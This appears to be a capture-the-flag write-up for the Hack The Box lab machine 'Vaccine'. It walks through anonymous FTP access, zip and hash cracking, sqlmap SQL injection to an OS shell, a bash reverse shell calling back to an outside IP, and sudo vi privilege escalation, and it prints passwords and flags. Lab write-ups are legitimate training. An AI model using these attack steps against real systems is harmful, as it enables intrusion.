Vaccine
Initial Scan
sudo nmap -T4 -Pn -sV -sC -v 10.129.248.153 -oA Vaccine

Task 1
Besides SSH and HTTP, what other service is hosted on this box?
Answer: FTP
Task 2
This service can be configured to allow login with any password for specific username. What is that username?
Answer: anonymous
Task 3
What is the name of the file downloaded over this service?
ftp 10.129.248.153

Answer: backup.zip
Task 4
What script comes with the John The Ripper toolset and generates a hash from a password protected zip archive in a format to allow for cracking attempts?


Answer: zip2john
Task 5
What is the password for the admin user on the website?


backup.zip password:41852963

Looking at index.html

Put the hash in a file and crack the hash with hashcat
hashcat -a 0 -m 0 hash /usr/share/wordlists/rockyou.txt

Answer:qwerty789
Task 6
What option can be passed to sqlmap to try to get command execution via the sql injection? Looking at sqlmap -h

Answer: --os-shell
Task 7
What program can the postgres user run as root using sudo?
Get the cookie from the Website.

sqlmap -u 'http://10.129.248.153/dashboard.php?search=any+query' --cookie="PHPSESSID=n33tru7g83ed1hqdgfm42gnqic" --os-shell
We get our shell.

Start the listener and run
bash -c "bash -i >& /dev/tcp/10.10.14.9/443 0>&1"

Answer: vi
Task 8
Submit user flag


Answer: ec9b13ca4d6229cd5cc1e09980965bf7
Task 9
Submit root flag
Looking at files in the /var/www/html as there's this uses PHP. Looking in the dashboard.php file we see

user=postgres password=P@s5w0rd!

Looking at various options on GTBOBins

Open a file we could only do as sudo vi
type :shell=/bin/sh
ENTER
:shell
ENTER


Answer: dd6e058e814260bc70e9bbdef2715849
Last updated